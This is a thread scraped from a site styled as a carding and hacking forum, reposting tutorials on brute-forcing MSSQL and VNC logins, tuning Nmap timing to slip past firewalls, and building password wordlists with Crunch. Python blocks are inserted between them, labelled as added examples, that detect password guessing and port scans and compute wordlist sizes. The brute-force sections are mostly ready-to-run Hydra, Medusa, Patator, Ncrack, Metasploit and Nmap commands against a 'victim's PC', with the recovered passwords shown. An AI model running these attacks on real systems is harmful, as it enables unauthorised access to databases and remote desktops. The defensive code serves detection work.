Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

[Guide] 4 ways to Hack MS SQL Login Password
In this article, we will learn how to gain control over our victim’s PC through port 1433, which is used by the MSSQL service. There are various ways to do it; let’s take the time to learn all of them, because different circumstances call for different measures.
Let’s start!!
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more.
Now, we need to choose a word list. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.128 mssql

Here,
-P: denotes the path of the password list
-L: denotes the path of the username text file (sa is the default MSSQL user)
Once the command is executed it will start the dictionary attack, and you will have the right password in no time. As you can observe, we successfully grabbed the MSSQL password apple@123456.
[Image: 1.png?w=687&ssl=1]
Medusa
Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, HTTP, IMAP, MSSQL, rlogin, SSH, and Subversion, to name a few.
Run the following command
medusa -h 192.168.1.128 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql

Here,
-U: denotes the path of the username file (sa is the default MSSQL user)
-P: denotes the path of the password list
As you can observe, we successfully grabbed the MSSQL password apple@123456.
[Image: 2.png?w=687&ssl=1]
xHydra
This is the graphical version used to apply a dictionary attack via port 1433 to hack a system. For this method to work:
Enter xhydra in your Kali Linux terminal. Select the Single Target option and give the IP of your victim PC there. Then select MSSQL in the box against the Protocol option and give the port number 1433 against the Port option.
[Image: 3.png?w=687&ssl=1]
Now, go to the Passwords tab, select Password List and give the path of your text file containing all the passwords in the box adjacent to it.
[Image: 4.png?w=687&ssl=1]
After doing this, go to the Start tab and click the Start button on the left.
Now the dictionary attack will start, and you will obtain the username (sa) and password of your victim.
[Image: 5.png?w=687&ssl=1]
Metasploit
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run


Awesome!! In the image below you can observe that the same password, apple@123456, has been found by Metasploit.
[Image: 6.png?w=687&ssl=1]
Nmap
The command given below will attempt to determine the username and password by brute force against MS-SQL using a username dictionary and a password dictionary.
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128

In the image below you can observe that we successfully retrieved the credentials username: sa and password: apple@123456.
[Image: 7.png?w=687&ssl=1]
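Every one of the four tools above produces the same artefact on the server side: a burst of failed logins for the same account from one client address, which SQL Server records in its ERRORLOG as event 18456 "Login failed for user" entries. The following detector is an added example written for this page, not code from the original article or from any of the tools it describes. The log lines are constructed to match the shape of those ERRORLOG entries (timestamp, "Logon" source, message, "[CLIENT: ip]"); the addresses, timestamps and counts are invented, and the threshold and window are assumptions to tune for your environment.

```python
import re
from datetime import datetime

# Constructed sample in the shape of SQL Server ERRORLOG "Login failed" entries
# (the lines written for event 18456). Timestamps, client addresses and the
# number of attempts are made up for this example.
SAMPLE_ERRORLOG = """\
2024-03-01 10:15:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2024-03-01 10:15:01.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2024-03-01 10:15:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2024-03-01 10:15:01.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2024-03-01 10:15:01.63 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2024-03-01 10:15:01.75 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
2024-03-01 10:16:40.00 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.1.50]
2024-03-01 10:20:00.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.126]
"""

LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(text):
    """Return a list of (timestamp, user, client) for every 'Login failed' line."""
    events = []
    for line in text.splitlines():
        m = LOGIN_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events


def detect_password_guessing(events, threshold=5, window_seconds=60):
    """Flag every client with at least `threshold` failures inside some
    `window_seconds` span. A sliding window over the sorted timestamps finds
    the densest span per client, so a slow, spread-out guesser with the same
    total count is not flagged by a long quiet gap."""
    by_client = {}
    for ts, user, client in events:
        by_client.setdefault(client, []).append((ts, user))
    alerts = []
    for client, items in by_client.items():
        items.sort()
        times = [ts for ts, _ in items]
        best, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({"client": client,
                           "failures": best,
                           "users": sorted({u for _, u in items})})
    return sorted(alerts, key=lambda a: a["client"])


if __name__ == "__main__":
    for alert in detect_password_guessing(parse_failed_logins(SAMPLE_ERRORLOG)):
        print(alert)
```

The check is worth wiring to an alert because SQL Server logins do not lock out by default; the usual mitigations on the server side are to disable or rename the well-known sa login, to enforce the Windows password policy on SQL logins, and to restrict who can reach port 1433 at the firewall in the first place.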

Hello everyone, in this article we will have a look at the different parameters that together make up a timing template and how to use those parameters individually as required.
Let’s Start!!
Nmap Timing Template
As we have seen, Nmap has multiple timing templates that can be used according to the requirement; see the timing scan article for details. Let’s see what’s inside a timing template. To get the description of a timing template we’ll use the -d attribute.

nmap -T4 -d -p21-25 192.168.1.139

Here we have multiple arguments that collectively make a timing template. Let’s have a look at them one by one.
  • Host-groups
  • Rtt-timeouts
  • Scan-delay
  • Max-retries
  • Min-rates
  • Parallelism
[Image: 1.png?w=687&ssl=1]
Maximum Retries (--max-retries)
--max-retries specifies the number of times a packet is resent to a port to check whether it is open or closed. If --max-retries is set to 0, each packet is sent only once and no retries are done.
nmap -p21-25 192.168.1.139 --max-retries 0

[Image: 2.png?w=687&ssl=1]
Here in Wireshark we can see that one TCP SYN packet was sent to each port from source 192.168.1.126 to destination 192.168.1.139, and none of them is sent again.
[Image: 3.png?w=687&ssl=1]
Now we will apply a small firewall rule on the target machine so that the packets get blocked if they come at a faster rate.
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 1 -j DROP


[Image: 4.png?w=687&ssl=1]
Now the normal scan will not show any results with --max-retries 0.
nmap -p21-25 192.168.1.139 --max-retries 0

[Image: 5.png?w=687&ssl=1]
As we can see, the packets that got dropped are not sent again, so the status of those ports is not determined.
[Image: 6.png?w=687&ssl=1]
Here we can increase the max-retries value, which bypasses the specified firewall filter so that we get the exact port status.
nmap -p21-25 192.168.1.139 --max-retries 5

[Image: 7.png?w=687&ssl=1]
Here we can see that the TCP SYN packets sent to one port from source 192.168.1.126 to destination 192.168.1.139 are sent again and again until a reply is returned or the maximum retry value (here 5) is reached.
[Image: 8.png?w=687&ssl=1]
Host-timeout
--host-timeout is an attribute that tells the scan to give up on a host after the specified time. The shorter the time specified, the greater the chance of inaccurate scan results.
We can specify the time in milliseconds (ms), seconds (s) or minutes (m).
nmap -p21-25 192.168.1.139 --host-timeout 10ms

[Image: 9.png?w=687&ssl=1]
Now we will try to get the result by increasing the timeout value.
nmap -p21-25 192.168.1.139 --host-timeout 100ms

[Image: 10.png?w=687&ssl=1]
We can use --host-timeout in other scenarios too, such as when we need to check whether a host is live or not. Here we show how the host-timeout can affect the results of a ping scan.
nmap -sP 192.168.1.139 --host-timeout 10ms

The output of the above command reports 0 hosts up.
nmap -sP 192.168.1.139 --host-timeout 100ms

The output of the above command reports 1 host up.
[Image: 11.png?w=687&ssl=1]
Hostgroup
The hostgroup attribute specifies how many hosts in the network are scanned at a time. You need to specify the minimum number of hosts, the maximum number of hosts, or both, to be scanned at a time.
nmap -sP 192.168.1.1/24 --min-hostgroup 3 --max-hostgroup 3

In the image below you can observe that it has shown only 3 live hosts from inside the complete subnet, saving you the time of scanning the complete network.
[Image: 12.png?w=687&ssl=1]
Scan delay
Scan delay delays each packet sent by the specified time. It is very useful in evading time-based firewalls.
nmap -p21-25 192.168.1.139 --scan-delay 11s

[Image: 13.png?w=687&ssl=1]
Here we can see the time difference between the packets.
Packet 1: TCP SYN packet on port 25 at 07:58:01 from 192.168.1.126 to 192.168.1.139
[Image: 14.png?w=687&ssl=1]
Packet 2: TCP SYN packet on port 22 at 07:58:12 from 192.168.1.126 to 192.168.1.139
If you count the time difference between these packets, you get an 11-second lapse between them.
[Image: 15.png?w=687&ssl=1]
Maximum rate (max-rate)
Rate is an attribute that specifies how fast packets are sent, in other words the number of packets sent at a time. Max-rate specifies the maximum number of packets to be sent at once.
nmap -p21-25 192.168.1.139 --max-rate 2

[Image: 16.png?w=687&ssl=1]
Wireshark shows that the packet sending rate does not exceed 2, meaning the number of packets sent at a time is less than or equal to 2.
Packet 1: TCP SYN packet on port 21 at 03:17:20 from 192.168.1.126 to 192.168.1.139
[Image: 17.png?w=687&ssl=1]
Packet 2: TCP SYN packet on port 23 at 03:17:21 from 192.168.1.126 to 192.168.1.139
If you count the time difference between these packets, you get a 1-second lapse between them, indicating that these two packets were not sent together.
[Image: 18.png?w=687&ssl=1]
Minimum rate (min-rate)
Min-rate specifies the minimum number of packets to be sent at once. Here, if we want at least 2 packets to be sent to the target’s network at the same time and not fewer, we need to execute the command below.
nmap -p21-25 192.168.1.139 --min-rate 2

[Image: 19.png?w=687&ssl=1]
Wireshark shows that the packet sending rate is greater than 2, meaning the number of packets sent at a time is equal to or greater than 2.
Packet 1: TCP SYN packet on port 23 at 03:28:29 from 192.168.1.126 to 192.168.1.139
[Image: 20.png?w=687&ssl=1]
Packet 2: TCP SYN packet on port 22 at 03:28:29 from 192.168.1.126 to 192.168.1.139
If you count the time difference between these packets, you get only a fraction of a second between them, indicating that these two packets were sent together.
[Image: 21.png?w=687&ssl=1]
Parallelism
The parallelism attribute is used to send multiple packets in parallel: min-parallelism means the number of packets sent in parallel must be at least the value specified, and max-parallelism means the number of packets sent in parallel must be less than or equal to the value specified.
nmap -p21-25 192.168.1.139 --min-parallelism 2 --max-parallelism 2

[Image: 22.png?w=687&ssl=1]
In Wireshark we can see a couple of TCP-SYN packets sent in parallel from 192.168.1.126 which is neither less nor greater than 2.
[Image: 23.png?w=687&ssl=1]
Round trip timeout
RTT timeout is the time allowed for a packet to return a reply; min-rtt-timeout specifies the minimum value of the time allowed for a packet to return a reply.
nmap -p21-25 192.168.1.139 --min-rtt-timeout 5ms

[Image: 24.png?w=687&ssl=1]
Wireshark shows that the packet and its reply take more time than the min-rtt-timeout specified.
[Image: 25.png?w=687&ssl=1]
packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139
packet 2: SYN-ACK packet from port 25 at 08:10:53.233466679 from 192.168.1.139 to 192.168.1.126
[Image: 26.png?w=687&ssl=1]
Max-rtt-timeout
max-rtt-timeout specifies the maximum value of the time allowed for a packet to return a reply.
nmap -p21-25 192.168.1.139 --max-rtt-timeout 50ms

[Image: 27.png?w=687&ssl=1]
Wireshark shows that the packet and its reply take less time than the max-rtt-timeout.
packet 1: TCP SYN packet on port 22 at 08:15:08.171777907 from 192.168.1.126 to 192.168.1.139
[Image: 28.png?w=687&ssl=1]
packet 2: SYN-ACK packet from port 22 at 08:15:08.173117154 from 192.168.1.139 to 192.168.1.126
[Image: 29.png?w=687&ssl=1]
Initial Round trip timeout
initial-rtt-timeout specifies the initial estimate of the time a packet takes to return a reply. The actual return time can be greater or less than initial-rtt-timeout, because max-rtt-timeout and min-rtt-timeout specify the range of time allowed for a reply, but Nmap starts out waiting for the time specified in initial-rtt-timeout.
nmap -p21-25 192.168.1.139 --initial-rtt-timeout 50ms

[Image: 30.png?w=687&ssl=1]
Wireshark shows that the time taken by the packet to return a reply is around the same as specified in initial-rtt-timeout.
packet 1: TCP SYN packet on port 23 at 08:18:45.342395520 from 192.168.1.126 to 192.168.1.139
[Image: 31.png?w=687&ssl=1]
packet 2: SYN-ACK packet from port 23 at 08:18:45.342930962 from 192.168.1.139 to 192.168.1.126
[Image: 32.png?w=687&ssl=1]
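The two iptables lines in the max-retries section are worth replaying, because their effect depends on rule order: both are inserted with -I, so the second command (the DROP with --update) ends up first in the chain, and the --set rule only sees packets the DROP rule let through. The simulation below is an added example written for this page, not code from the article or from Nmap; it replays that two-rule recent-module filter for a single source and then runs the simple detector a defender would use instead: counting distinct destination ports per source over a longer window, which a scan slowed with --scan-delay still trips even though it slips under a one-second hit-count rule. The probe timings are constructed, the window and port threshold are assumptions, and the rule model covers only --hitcount 1.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Probe:
    t: float      # seconds since the capture started
    src: str
    dst: str
    dport: int


# Constructed probe sets modelled on the page's scans of ports 21-25 on
# 192.168.1.139; the timings are invented for this example.
FAST_SCAN = [Probe(0.002 * i, "192.168.1.126", "192.168.1.139", 21 + i) for i in range(5)]
SLOW_SCAN = [Probe(11.0 * i, "192.168.1.126", "192.168.1.139", 21 + i) for i in range(5)]   # --scan-delay 11s
BENIGN = [Probe(0.0, "192.168.1.50", "192.168.1.139", 22),
          Probe(30.0, "192.168.1.50", "192.168.1.139", 22)]


def simulate_recent_rule(probes, seconds=1.0):
    """Replay the page's two-rule filter for NEW TCP packets:
    rule 1 (evaluated first): -m recent --update --seconds N --hitcount 1 -j DROP
    rule 2:                   -m recent --set
    A packet is dropped when its source was last seen within `seconds`;
    --update refreshes the timestamp even on a dropped packet, so a stream
    of fast probes stays blocked. Anything else falls through to --set.
    Returns (passed, dropped)."""
    last_seen = {}
    passed, dropped = [], []
    for p in sorted(probes, key=lambda p: p.t):
        seen = last_seen.get(p.src)
        if seen is not None and p.t - seen <= seconds:
            last_seen[p.src] = p.t       # --update refreshes the entry
            dropped.append(p)
        else:
            last_seen[p.src] = p.t       # --set adds (or refreshes) the entry
            passed.append(p)
    return passed, dropped


def scanning_sources(probes, window=60.0, min_ports=5):
    """Per source, the largest number of distinct destination ports probed
    within any `window`-second span; sources reaching `min_ports` are
    reported. Every SYN on the wire is counted, including those the INPUT
    rule dropped, because a tap or IDS sees them either way."""
    by_src = {}
    for p in probes:
        by_src.setdefault(p.src, []).append(p)
    found = {}
    for src, items in by_src.items():
        items.sort(key=lambda p: p.t)
        best = 0
        for i, first in enumerate(items):
            ports = {p.dport for p in items[i:] if p.t - first.t <= window}
            best = max(best, len(ports))
        if best >= min_ports:
            found[src] = best
    return found


if __name__ == "__main__":
    for name, scan in (("fast", FAST_SCAN), ("slow", SLOW_SCAN)):
        passed, dropped = simulate_recent_rule(scan)
        print(name, "passed:", len(passed), "dropped:", len(dropped),
              "flagged:", scanning_sources(scan))
```

With --max-retries 0 the four dropped probes of the fast scan are exactly the ports whose state the page shows as undetermined; with retries Nmap resends them, and each retry that lands more than a second after the previous packet gets through the --set rule. The longer-window detector is the complementary control: it does not care how slowly the probes arrive, only how many distinct ports one source touches.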

Hello friends!! Today we will demonstrate how a pentester can generate his own wordlist for usernames or passwords using the powerful tool Crunch. In Kali Linux you can find crunch under Application > Password Attacks > Crunch.
Crunch can generate a wordlist subject to the conditions you specify, and its output file can be used in any other program or file.
[Image: 1.png?w=687&ssl=1]
We are using crunch version 3.6 for this tutorial and used the following parameters for generating a wordlist.
Syntax: <min> <max> [character-string] [options]
Min-len: this parameter specifies the minimum length of string from which crunch starts generating the wordlist.
Max-len: this parameter specifies the maximum length of string at which crunch stops.
Charset string: this parameter specifies the character set crunch uses for generating the wordlist; if you have not specified any string, crunch uses its default character set.
Options: crunch offers a list of options that extend its functionality for generating a wordlist as per your requirement.
[Image: 2.0.png?w=687&ssl=1]
Generating wordlist without using the character string
Execute the command given below, which generates a dictionary containing words of minimum 2 and maximum 3 characters using the default character set. It will start from aa and end with zzz.
crunch 2 3 -o /root/Desktop/0.txt

Here we used the following parameters for generating a dictionary:
Min_len: 2, for two-character words
Max_len: 3, for three-character words
-o: this option denotes the path for saving the output in a text file.
In the image below you can observe that it generated 18252 lines and saved them in the 0.txt file.
[Image: 2.1.png?w=687&ssl=1]
Now we used the cat command to read the contents of the 0.txt file, where we can see that it starts from aa and ends with zzz, as shown in the image below.
cat /root/Desktop/0.txt

[Image: 2.2.png?w=687&ssl=1]
[Image: 2.3.png?w=687&ssl=1]
Generating wordlist using the character string
Now execute the command given below, which generates a dictionary containing words of minimum 3 and maximum 4 characters using “raj” as the specified string. Similarly, it will start from rrr and end with jjjj.
crunch 3 4 raj -o /root/Desktop/1.txt

In the image below you can observe that it generated 108 lines and saved them in the 1.txt file.
[Image: 3.png?w=687&ssl=1]
Now we used the cat command to read the contents of the 1.txt file, where we can see that it starts from rrr and ends with jjjj.
cat /root/Desktop/1.txt

Similarly, we can use a string of digits to make a dictionary of numeric words.
For example, some users set their date of birth as their password. If we would like to generate a dictionary of four-digit combinations representing a day and month, for instance 25th May as 2505, then we can use “2505” as the character string for generating a numeric wordlist.
[Image: 4.png?w=687&ssl=1]
Generating alpha-numeric wordlist
You can generate your own alphanumeric wordlist: execute the command given below, which generates a dictionary containing words of minimum 2 and maximum 3 characters using “raj123” as the specified string.
You can set the minimum and maximum length of your wordlist as per your requirement.
crunch 2 3 raj123 -o /root/Desktop/3.txt

[Image: 7.1.png?w=687&ssl=1]
Again we used the cat command to read the contents of the 3.txt file, where we can see that it contains combinations of alphanumeric characters.
cat /root/Desktop/3.txt

[Image: 7.2.png?w=687&ssl=1]
Generating a wordlist along with the space character
The following command generates a wordlist using the space character, escaped with a backslash (raj\ ), together with the string “raj”. Instead of the backslash you can also put double quotes around the string, as “raj ”, with the space inside the quotes.
crunch 1 3 raj\  -o /root/Desktop/4.txt

[Image: 7.png?w=687&ssl=1]
Create a wordlist using the character set file of RainbowCrack
As we know, RainbowCrack has a character set file which is used for cracking hashes with rainbow tables, but we’ll use this character set file for generating a complex wordlist as the situation demands.
cat /usr/share/rainbowcrack/charset.txt

We used the cat command to display the list of character sets stored in RainbowCrack’s charset.txt. In the image below you can observe that it shows the following character sets.
  • Numeric
  • Alpha
  • Alpha-numeric
  • Loweralpha
  • Loweralpha numeric
  • Mixalpha
  • Mixalpha-numeric
  • Ascii -32-95
  • Ascii -32-65-123-4
  • Alpha-numeric-symbol32-space
[Image: 8.png?w=687&ssl=1]
Now you can choose any character set for generating a wordlist. Suppose I want to generate a wordlist of 4- and 5-character words containing lowercase letters along with digits; for that I execute the following command.
crunch 4 5 -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o /root/Desktop/5.txt

Here -f specifies the character-set file and the name of the set to use from it (here loweralpha-numeric from RainbowCrack’s charset.txt).
[Image: 9.png?w=687&ssl=1]
Again we used the cat command to read the contents of the 5.txt file, where we can see that it contains combinations of alphanumeric characters.
cat /root/Desktop/5.txt

[Image: 10.png?w=687&ssl=1]
Generate a wordlist with a specific pattern
Crunch provides the -t option to generate a wordlist using a specific pattern as per your requirement.
Using option -t you can use the following four placeholders in a pattern:
  • Use @ for lowercase letters
  • Use , for uppercase letters
  • Use % for numeric characters
  • Use ^ for special-character symbols
To generate a wordlist that contains 3 numeric characters to the right of the string “raj”, for instance raj123, we need to execute the following command.
Since we have 3 letters from the string raj and we are assuming 3 more digits after the given string, the minimum length should be the sum of the string and the pattern characters, i.e. 6.
crunch 6 6 -t raj%%% -o /root/Desktop/6.txt

Here -t denotes the pattern; % is used for the 3 numeric characters.
[Image: 11.png?w=687&ssl=1]
Again we used the cat command to read the contents of the 6.txt file, where we can see that it contains combinations of alphanumeric characters.
cat /root/Desktop/6.txt

[Image: 12.png?w=687&ssl=1]
Generate a wordlist with a duplicate-character limit
Crunch lets you bound the repetition of characters by using the -d parameter along with the given pattern.
As we saw above, the pattern raj%%% starts with raj000, which means a digit may be repeated consecutively twice or three times, so the wordlist contains words such as raj000, raj001, raj111, raj110 and so on.
If you don’t wish to create a wordlist with such repeated digits, you can use the -d option to set a filter for repetition.
For example, I want to generate a wordlist using the above pattern, raj%%%, with each digit repeated consecutively at most twice. To produce such a dictionary we need to execute the command below.
crunch 6 6 -t raj%%% -d 2% -o /root/Desktop/6.1.txt

Here we used the following parameters:
-t denotes the pattern; % is used for the 3 numeric characters.
-d 2% limits the consecutive repetition of each digit to at most twice.
[Image: 13.1.png?w=687&ssl=1]
Again we used the cat command to read the contents of the 6.1.txt file, where we can see combinations of alphanumeric characters with each digit repeated at most twice in a row.
cat /root/Desktop/6.1.txt

Now if you compare the output files 6.txt and 6.1.txt, you can notice the difference in digit repetition.
[Image: 13.2.png?w=687&ssl=1]
Generate a wordlist with a pattern for uppercase letters
To generate a wordlist that contains 3 uppercase characters to the right of the string “raj”, for instance rajABC, we need to execute the following command.
Since we have 3 letters from the string raj and we are assuming 3 more uppercase letters after the given string, the minimum length should be the sum of the string and the pattern characters, i.e. 6.
crunch 6 6 -t raj,,, -o /root/Desktop/7.txt

Here -t denotes the pattern; the comma (,) is used for the 3 uppercase letters.
[Image: 13.png?w=687&ssl=1]
Again we used the cat command to read the contents of the 7.txt file, where we can see that it contains combinations of mixed-case letters.
cat /root/Desktop/7.txt

[Image: 14.png?w=687&ssl=1]
Similarly, we can set the limit for uppercase-letter repetition as done above. So if I want no letter to be repeated consecutively, we can execute the command given below to generate such a dictionary.
crunch 6 6 -t raj,,, -d 1, -o /root/Desktop/7.1.txt

-t denotes the pattern; the comma (,) is used for the 3 uppercase letters.
-d 1, limits each uppercase letter to at most one consecutive occurrence, i.e. no letter is repeated back to back.
[Image: 15.1.png?w=687&ssl=1]
Again we used the cat command to read the contents of the 7.1.txt file, where we can see combinations of mixed-case letters with no letter repeated consecutively.
cat /root/Desktop/7.1.txt

Now if you compare the output files 7.txt and 7.1.txt, you can notice the difference in letter repetition.
[Image: 15.2.png?w=687&ssl=1]
Use permutation for generating a wordlist
The -p option is used for generating a wordlist by permutation; with it the min and max length arguments are ignored. Moreover, it can be used with a one-word string or with multiple words, as given below.
crunch 3 6 -p raj chandel hackingarticles

In the image below you can analyse the output and see the number of permutations generated.
[Image: 15.png?w=687&ssl=1]
Generate a dictionary with a limited number of words
If you observe all the output above, you will find that crunch generated each dictionary and displayed the number of lines in it. For instance, the text file 0.txt has 18252 lines and each line contains one word only.
So if you wish to limit the number of lines generated, execute the command given below.
crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt

It will generate a dictionary of 25 words only and save the output in 8.txt.
[Image: 16.1.png?w=687&ssl=1]
Again we used the cat command to read the contents of the 8.txt file, where we can see that it has only 25 words.
cat /root/Desktop/8.txt

[Image: 16.2.png?w=687&ssl=1]
Wordlist fragmentation
Use the -b option for wordlist fragmentation, which splits a single wordlist into multiple wordlists. It is quite a useful option for dividing a wordlist of several GB into MB-sized pieces.
crunch 5 7 raj@123 -b 3mb -o START

In the image below you can observe that it has divided a 7MB file into three text files.
[Image: 17.png?w=687&ssl=1]
Generate a compressed dictionary
Crunch lets you generate a compressed wordlist with option -z; its parameters are gzip, bzip2, lzma and 7z. Execute the command given below for compression.
crunch 5 7 raj@123 -z gzip -o START

In the image below you can observe that it has generated the compressed text file.
[Image: 18.png?w=687&ssl=1]
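The line counts crunch prints throughout this article are not arbitrary: for a plain charset run they are the sum of k^n over the requested lengths, and for a -t pattern with a -d limit they are the number of strings with no run of identical characters longer than the limit. The following calculator is an added example written for this page, not crunch's own code; it reproduces the 18252 lines of 0.txt (26^2 + 26^3), the 108 lines of 1.txt (3^3 + 3^4), the 1000 words of raj%%%, and the -d variants of the raj%%% and raj,,, patterns, without writing a wordlist at all. The placeholder set sizes for @, , and % are crunch's defaults; the ^ symbol set is left out because its size depends on the build's symbol list, and the calculator assumes that literal characters in a pattern never take part in a -d run.

```python
from itertools import groupby

# Sizes of crunch's default placeholder sets: @ lowercase, , uppercase, % digits.
# ^ (symbols) is omitted: its size depends on the symbol list crunch is built with.
PLACEHOLDER_SIZE = {"@": 26, ",": 26, "%": 10}


def keyspace_size(alphabet_size, min_len, max_len):
    """Lines crunch emits for `crunch <min> <max> <charset>` with no pattern:
    every length from min to max, alphabet_size**length strings each."""
    return sum(alphabet_size ** n for n in range(min_len, max_len + 1))


def count_with_run_limit(alphabet_size, length, max_run):
    """Strings of `length` over `alphabet_size` symbols in which no symbol
    appears more than `max_run` times in a row, which is what crunch's
    -d <max_run><placeholder> keeps. Dynamic programme over the length of
    the trailing run: runs[r] counts strings whose last r symbols are equal."""
    if length == 0:
        return 1
    runs = {1: alphabet_size}
    for _ in range(length - 1):
        total = sum(runs.values())
        nxt = {1: (alphabet_size - 1) * total}   # append a different symbol: run resets to 1
        for r in range(2, max_run + 1):
            nxt[r] = runs.get(r - 1, 0)          # append the same symbol: run grows by one
        runs = nxt
    return sum(runs.values())


def pattern_count(pattern, dup_limit=None):
    """Lines for `crunch N N -t <pattern>` with N == len(pattern). `dup_limit`
    is an optional (k, placeholder) pair standing for `-d k<placeholder>`.
    Consecutive placeholders of one kind form a run; literals contribute one
    choice and are assumed not to take part in a -d run."""
    total = 1
    for ch, group in groupby(pattern):
        n = len(list(group))
        if ch not in PLACEHOLDER_SIZE:
            continue
        k = PLACEHOLDER_SIZE[ch]
        if dup_limit is not None and dup_limit[1] == ch:
            total *= count_with_run_limit(k, n, dup_limit[0])
        else:
            total *= k ** n
    return total


if __name__ == "__main__":
    print("crunch 2 3            ->", keyspace_size(26, 2, 3))           # 18252, as in 0.txt
    print("crunch 3 4 raj        ->", keyspace_size(3, 3, 4))            # 108, as in 1.txt
    print("-t raj%%%             ->", pattern_count("raj%%%"))
    print("-t raj%%% -d 2%       ->", pattern_count("raj%%%", (2, "%")))
    print("-t raj,,, -d 1,       ->", pattern_count("raj,,,", (1, ",")))
```

Read the other way round, the same numbers tell a defender what a password policy buys: a six-character password made of a fixed word plus three digits leaves at most 1000 candidates, and the -d filters shrink that further, which is why lockout and rate limiting on the login, not password length alone, decide how long the dictionary attacks earlier in this thread take to finish.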

In this article, we will learn how to gain control over our victim’s PC through port 5900, which is used by the VNC service. There are various ways to do it; let’s take the time to learn all of them, because different circumstances call for different measures.
Table of Contents
  • Hydra
  • X-Hydra
  • Medusa
  • Ncrack
  • Patator
  • Metasploit
Let’s start!!
xHydra
This is the graphical version used to apply a dictionary attack via port 5900 to hack a system. For this method to work:
Enter xhydra in your Kali Linux terminal. Select the Single Target option and give the IP of your victim PC there. Then select VNC in the box against the Protocol option and give the port number 5900 against the Port option.
[Image: 1.png?w=687&ssl=1]
Now, go to the Passwords tab, select Password List and give the path of your text file containing all the passwords in the box adjacent to it.
[Image: 2.png?w=687&ssl=1]
After doing this, go to the Start tab and click the Start button on the left.
Now the dictionary attack will start, and you will obtain the username and password of your victim.
[Image: 3.png?w=687&ssl=1]
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more.
Now, we need to choose a word list. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
hydra -s 5900 -P /root/Desktop/pass.txt -t 16 192.168.0.6 vnc

-P: denotes the path of the password list
-s: denotes the destination port number
-t: runs TASKS number of connects in parallel
Once the command is executed it will start the dictionary attack, and you will have the right password in no time. As you can observe, we successfully grabbed the VNC password 098765.
[Image: 4.png?w=687&ssl=1]
Metasploit
This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run


Awesome!! In the image below you can observe that the same password, 098765, has been found by Metasploit.
[Image: 5.png?w=687&ssl=1]
Patator
Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is quite useful for brute-force attacks on several services such as VNC, HTTP, SMB, etc.
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0

[Image: 6.png?w=687&ssl=1]
In the image below you can observe that the dictionary attack starts, and thus you will obtain the password of your victim.
[Image: 7.1.png?w=687&ssl=1]
Medusa
Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, HTTP, IMAP, rlogin, SSH, Subversion, and VNC, to name a few.
Run the following command
medusa -h 192.168.0.6 -u root -P /root/Desktop/pass.txt -M vnc

Here
-u: denotes the username
-P: denotes the path of the password list
As you can observe, we successfully grabbed the VNC password 098765.
[Image: 7.png?w=687&ssl=1]
Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command
ncrack -V --user root -P /root/Desktop/pass.txt 192.168.0.6:5900

Here
--user: denotes the username (here root)
-P: denotes the path of the password list
As you can observe, we successfully grabbed the VNC password 098765.
